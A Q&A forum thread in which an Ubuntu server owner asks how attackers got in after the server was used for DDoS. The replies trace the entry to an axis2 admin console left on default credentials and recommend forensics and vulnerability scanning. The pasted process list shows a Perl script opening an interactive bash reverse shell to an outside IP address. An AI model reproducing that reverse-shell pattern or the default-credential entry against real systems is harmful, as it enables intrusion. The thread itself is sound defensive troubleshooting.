# How to find vulnerabilities in ubuntu services?

Tags: linux, ubuntu, security, trojan

I have an ubuntu server running. Today I found that the server got hacked and is being used for DDoS through amazon abuse report.

I found the following things on the server.

The following suspecious files where there on the server.

```
-rw-r--r-- 1 www-data www-data      759 Dec 21 15:38 weiwei.pl
-rwxrwxrwx 1 www-data www-data  1223123 Dec 26 02:20 huizhen
-rwxr-xr-x 1 www-data www-data        5 Jan 26 14:21 gates.lod
-rwxrwxrwx 1 www-data www-data  1135000 Jan 27 14:09 sishen
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.5
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.4
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.3
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.2
-rw-r--r-- 1 www-data www-data      759 Jan 27 14:36 weiwei.pl.1
-rwxr-xr-x 1 www-data www-data        5 Jan 28 14:00 vga.conf
-rw-r--r-- 1 www-data www-data      119 Jan 29 06:22 cmd.n
-rw-r--r-- 1 www-data www-data       73 Feb  1 01:01 conf.n
```

The following process was running

```
www-data  8292 10629  0 Jan28 ?        00:00:00 perl /tmp/weiwei.pl 222.186.42.207 5222
www-data  8293  8292  0 Jan28 ?        00:00:00 /bin/bash -i
www-data  8293  8292  0 Jan28 ?        00:00:00 ./huizhen
```

I ran `clamav` and it deleted `/tmp/huizhen` and `/tmp/sishen` files but the processes were still running `weiwei.pl` and `./huizhen` so I killed them manually.

I have the following services running on the server.

- SSH - Not using default port 22, only key authentication
- MongoDB - Port is open for a specific security group
- Memcache - Port is open for a specific security group
- NodeJS - Port is open for a specific security group
- Tomcat - 8080/8443 ports are public for axis2 webservice and solr

My assumption is that the hacker got in through some tomcat/axis2/solr vulnerability because the process are running using the same user group as tomcat.

I have blocked 8080/8443 ports for now and will be replacing the server with a new one. Tomcat will be accessible from a different server through nginx. I have also installed security patches using [unattended-upgrades](https://askubuntu.com/a/578789/130414).

The problem is how to find how the hacker got in and planted the trojans. What other steps I can take to tighten the security.

Comment: The vulnerability is almost certainly at the application tier, so confirm your webserver config, and the configuration of the applications you run in it. Confirm that your webserver and application components (like perl runtime) are up to date.

Comment: Once a server is compromised, cleaning out the infection fully is probably more trouble than it's worth. Consider a reinstall.

Comment: @FrankThomas, Thanks, you were right. It was in fact at the application tier. axis2 admin console was publicly accessible with default un/pw. They found it and uploaded a webservice which gives access to low level features like executing commands, get shell access, create files etc.

Comment: @BenN, That is the first thing that I am going to do but the thing is that this is not the first time it happened so I had to find the door from where they were getting in.

Answer (score 1):

This is quite a reasonable question. Strictly speaking, your best bet to answer it would have been to freeze your system and to perform forensic tests. Any later intervention on your part, including virus removal, will alter and possibly erase altogether any bread crumb left behind by your intruder.

Given that this path is no longer open to you, the best thing is to use a Vulnerability Scanner, a program *i.e.* designed exactly in order to stress-test your installation. There are very may, you may just Google the term `Vulnerability Scanner`, but by far the best known is [Nessus](https://www.tenable.com/products/nessus-vulnerability-scanner). It  comes in several version, from free to paid with different licenses, and it can become quite expensive, possibly more than you are willing to fork out.

However, there is also a free version of it, which comes pre-installed on [Kali Linux](https://www.kali.org/). You will have to register it, even though it is completely free. Many of us use Kali by installing it onto a VM on a laptop, then performing the stress-tests from outside our homes, to see which defects (=non-patched, known vulnerabilities, most often) are left on the applications running on an Internet-facing server.

There are guides teaching you how to use that all over the Internet, and you can try it also within your own LAN (if you trust your firewall), and even from within the same pc, if you will be running Kali as a VM.